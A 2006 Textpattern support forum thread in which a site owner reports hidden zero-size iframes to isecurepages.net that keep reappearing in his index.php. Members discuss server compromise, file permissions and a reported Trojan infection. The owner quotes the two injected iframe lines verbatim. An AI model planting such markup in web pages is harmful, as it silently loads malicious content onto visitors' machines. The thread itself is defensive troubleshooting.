Weird iSecurePages code in index.php

johan_vm · 2006-11-22 18:01:27

Hi,

this code appeared in my index.php (on http://www.onrails.be)

<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>

<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>

I didn’t add it myself.

In fact, I already deleted it a while ago (because it makes my site fail it’s XHTML validation).
But it re-appeared.

Does anybody know what this is?
Is it textpattern-related?
Hosting related?

It certainly is weird…

regards,

Johan.

Last edited by johan_vm (2006-11-22 18:02:07)

variaas · 2006-11-22 19:48:40

Johan,

I did a quick search for isecurepages.net and the first couple links point to websites that had been hacked.

What version of Textpattern are you running right now? According to the amazing TXP FAQ, “there is no confirmed report of a successfully exploited security hole in a properly maintained TXP website.” I would contact your hosting company to inform them and to take a look into the issue.

Sencer · 2006-11-22 19:59:47

this code appeared in my index.php

Inside the file index.php? Than it likely hasn’t to do with anything textpattern, because textpattern usually doesn’t write to files, on most server-environments PHP wouldn’t have the rights to write to that file even.

It could well be a server-thing. Are you maintaining the server, or are you on a shared server?

soulship · 2006-11-22 20:38:45

Is your host uh-hosting.co.uk? It seems like there are plenty of reports of this on their forum

johan_vm · 2006-11-22 22:24:55

I’m on a shared server, but my host is 1-eurohost.com, located in Brussels.

Textpattern does print out this warning in the admin interface:

De PHP versie die U gebruikt kan een veiligheids risico veroorzaken. Zet register_globals uit of gebruik een nieuwere versie van PHP.

Meaning:
There’s a safety risk in your PHP version. Turn off register_globals, or upgrade tot a newer version.

So this could be malicious code?

Can it really mess up my TXP install?

regards,

Johan.

zem · 2006-11-23 21:12:24

If you’re running a stock copy of 4.0.3 or 4.0.4 it’s unlikely it was hacked, even with register_globals turned on, though not impossible of course.

Every case of a “hacked” Textpattern install we’ve investigated has turned out to be caused by some other PHP or CGI script installed in the same account, or a global server attack against Apache.

If you have other scripts installed, take note of the version numbers and update or remove them. Talk to your hosting company, find out if the server was attacked, or if they know of attacks against any of those scripts.

Can you tell us whether your front page “index.php” is handled by Textpattern, or is it a custom index.php script you’ve written yourself? Where is the bogus link code stored – is it inside a Textpattern page template, in a file..?

If you do find any information about a potential security hole in Textpattern, please don’t post it on the forum – contact Team Textpattern directly, or ask your hosting company to contact us.

Last edited by zem (2006-11-23 21:17:48)

jayrope · 2006-11-24 11:17:56

that kind of hack has happened to me before.
it’s a file permissions problem, which arises, when your ftp client uploads files (in this case index.php of txp) with a custom prereference set to changing the file permissions. try narrowing down the permissions manually on your index.php until it appears inaccessible for a browser. then change them back to the last state before.
i don’t remember the exact permissions, which i had to reset after a bunch of websites of mine got defaced.
alex, do you have a hint for this?

zem · 2006-11-24 22:29:42

A hint about what?

Permissions alone aren’t the problem. They might be an important part of the hack, but there still has to be a buggy script or other software that allows the attackers to take advantage of the file permissions.

Again: we need to know where the bogus link code appears: in a PHP file, a page template, or somewhere else.

Mary · 2006-11-25 03:15:03

Yikes! Scan your computers everyone, and make sure to block both isecurepages.net and orthone.com from being loaded by your browser. My computer was infected with a Trojan and tracking cookie, and was port scanned.

soulship · 2006-11-25 16:13:47

My computer was infected with a Trojan

What trojan was it?

EDIT: I’m paranoid about things like that so I looked through all my cookies and scanned my computer, but found nothing. Wierd huh. Maybe that 29 bucks I spent on outpost is paying for itself.

Last edited by soulship (2006-11-25 16:43:38)

Mary · 2006-11-26 13:38:41

Don’t remember now. :/

Johan, does the code appear within a page template or…?

zem · 2006-11-29 21:41:14

Can someone please answer the question?

Where does the isecurepages link appear – in Textpattern page template or form, in a PHP file, or somewhere else?

Textpattern CMS

Textpattern CMS support forum

#1 2006-11-22 18:01:27

Weird iSecurePages code in index.php

#2 2006-11-22 19:48:40

Re: Weird iSecurePages code in index.php

#3 2006-11-22 19:59:47

Re: Weird iSecurePages code in index.php

#4 2006-11-22 20:38:45

Re: Weird iSecurePages code in index.php

#5 2006-11-22 22:24:55

Re: Weird iSecurePages code in index.php

#6 2006-11-23 21:12:24

Re: Weird iSecurePages code in index.php

#7 2006-11-24 11:17:56

Re: Weird iSecurePages code in index.php

#8 2006-11-24 22:29:42

Re: Weird iSecurePages code in index.php

#9 2006-11-25 03:15:03

Re: Weird iSecurePages code in index.php

#10 2006-11-25 16:13:47

Re: Weird iSecurePages code in index.php

#11 2006-11-26 13:38:41

Re: Weird iSecurePages code in index.php

#12 2006-11-29 21:41:14

Re: Weird iSecurePages code in index.php

Board footer